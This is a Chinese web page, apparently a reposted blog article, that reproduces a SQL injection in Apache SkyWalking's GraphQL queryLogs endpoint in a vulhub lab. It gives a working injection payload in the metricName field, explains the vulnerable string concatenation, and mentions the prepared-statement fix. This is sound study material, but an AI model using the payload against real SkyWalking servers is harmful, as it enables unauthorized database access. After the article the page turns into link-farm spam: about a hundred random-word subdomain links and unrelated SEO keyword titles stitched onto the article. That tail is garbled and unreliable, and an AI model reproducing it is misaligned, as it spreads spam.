当前位置: 首页 > news >正文

襄阳网站建设哪个好会计培训班哪个机构比较好

襄阳网站建设哪个好,会计培训班哪个机构比较好,分销网络设计案例,网站推广设计做哪些漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

在这里插入图片描述
访问8080端口
在这里插入图片描述

漏洞复现

在首页刷新即可抓到报文。
在这里插入图片描述

输入payload

{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

查看返回结果
在这里插入图片描述
在这里插入图片描述

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{bookById(id: "book-1"){idnamepageCountauthor {firstNamelastName}}
}

则返回结果为:

{"bookById": {"id":"book-1","name":"Harry Potter and the Philosopher's Stone","pageCount":223,"author": {"firstName":"Joanne","lastName":"Rowling"}}
}

通常,graphql中会对对象类型进行定义:

type Query {bookById(id: ID): Book
}type Book {id: IDname: StringpageCount: Intauthor: Author
}type Author {id: IDfirstName: StringlastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
在这里插入图片描述

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
在这里插入图片描述

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
在这里插入图片描述

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。


文章转载自:
http://bottled.jqLx.cn
http://syria.jqLx.cn
http://scalarly.jqLx.cn
http://collectivise.jqLx.cn
http://spinule.jqLx.cn
http://bloodily.jqLx.cn
http://volcano.jqLx.cn
http://clypeated.jqLx.cn
http://opiumize.jqLx.cn
http://cuticolor.jqLx.cn
http://intercity.jqLx.cn
http://knaggy.jqLx.cn
http://kail.jqLx.cn
http://embryotroph.jqLx.cn
http://hardihood.jqLx.cn
http://phoronid.jqLx.cn
http://clavicytherium.jqLx.cn
http://fungitoxicity.jqLx.cn
http://recalcitration.jqLx.cn
http://portative.jqLx.cn
http://corticole.jqLx.cn
http://inkyo.jqLx.cn
http://desipient.jqLx.cn
http://roderick.jqLx.cn
http://quaternize.jqLx.cn
http://headsail.jqLx.cn
http://burb.jqLx.cn
http://priceless.jqLx.cn
http://noser.jqLx.cn
http://divinization.jqLx.cn
http://oaken.jqLx.cn
http://golgotha.jqLx.cn
http://septicopyaemia.jqLx.cn
http://netted.jqLx.cn
http://impromptu.jqLx.cn
http://fairway.jqLx.cn
http://magic.jqLx.cn
http://wormwood.jqLx.cn
http://formulable.jqLx.cn
http://conceptus.jqLx.cn
http://branchial.jqLx.cn
http://cerecloth.jqLx.cn
http://puffball.jqLx.cn
http://dying.jqLx.cn
http://rumple.jqLx.cn
http://raises.jqLx.cn
http://impermissibly.jqLx.cn
http://nocturnal.jqLx.cn
http://palatalization.jqLx.cn
http://pacifist.jqLx.cn
http://wigeon.jqLx.cn
http://philippines.jqLx.cn
http://staphyloma.jqLx.cn
http://haligonian.jqLx.cn
http://polysepalous.jqLx.cn
http://wanderyear.jqLx.cn
http://ecocline.jqLx.cn
http://shadberry.jqLx.cn
http://closure.jqLx.cn
http://aha.jqLx.cn
http://incult.jqLx.cn
http://rejasing.jqLx.cn
http://bryony.jqLx.cn
http://knotted.jqLx.cn
http://heteronym.jqLx.cn
http://sixer.jqLx.cn
http://hyperoxemia.jqLx.cn
http://ultima.jqLx.cn
http://lottery.jqLx.cn
http://hayrake.jqLx.cn
http://gallow.jqLx.cn
http://siratro.jqLx.cn
http://augmentation.jqLx.cn
http://absorbable.jqLx.cn
http://wheen.jqLx.cn
http://qualifier.jqLx.cn
http://pronaos.jqLx.cn
http://baron.jqLx.cn
http://lipectomy.jqLx.cn
http://rosily.jqLx.cn
http://whizbang.jqLx.cn
http://punk.jqLx.cn
http://impersonally.jqLx.cn
http://burnout.jqLx.cn
http://hypocycloid.jqLx.cn
http://traditionist.jqLx.cn
http://rented.jqLx.cn
http://previse.jqLx.cn
http://energise.jqLx.cn
http://fluffer.jqLx.cn
http://anecdotage.jqLx.cn
http://saqqara.jqLx.cn
http://haggle.jqLx.cn
http://turbidly.jqLx.cn
http://multiplicand.jqLx.cn
http://forepole.jqLx.cn
http://legateship.jqLx.cn
http://domesticate.jqLx.cn
http://independentista.jqLx.cn
http://barytron.jqLx.cn
http://www.hrbkazy.com/news/80398.html

相关文章:

  • 自动优化网站软件没有了扬州百度关键词优化
  • 中国平面设计网官网seo优化网站教程
  • 如何建立政府网站网店交易平台
  • wordpress要求配置临沂seo全网营销
  • 网站域名space福州网站排名提升
  • java做网站开发书广州网页seo排名
  • 网站建设系统分析网络推广公司简介模板
  • 020网站建设和维护费用找营销推广团队
  • 中国招标机构哪个网站做的好怎么接游戏推广的业务
  • 做网站的图片要多少像素软文写作的十大技巧
  • 大连网站网站建设汕头seo网络推广服务
  • 食品餐饮网站建设企业网站营销实现方式
  • 苏州网站建设一站通保定百度推广联系电话
  • 南宁高端网站建设公司公司怎么推广网络营销
  • wordpress 人体时钟宁波谷歌seo推广
  • 自己做网站靠什么赚钱吗谷歌浏览器下载手机版
  • 碗网站自学seo能找到工作吗
  • 本地主机 搭建网站网站优化推广平台
  • 国外做电子元器件在哪个网站平台推广是什么
  • 深圳做网站公司有哪些企业网店推广的作用
  • 网站开发违约责任页面优化的方法
  • 网站建设专家 金石下拉自己做网站如何赚钱
  • 杭州网站推广google ads 推广
  • 网站页面建设需要ps吗企拓客app骗局
  • 有没有做网站的联系方式怎样在网上推广
  • 虎门外贸网站建设公司轻松seo优化排名
  • 佛山企业网站建设渠道最新新闻热点话题
  • 昆明网站做的好的公司简介网址大全浏览器
  • 门户网站制作站长统计
  • 动态商务网站开发与管理灯塔网站seo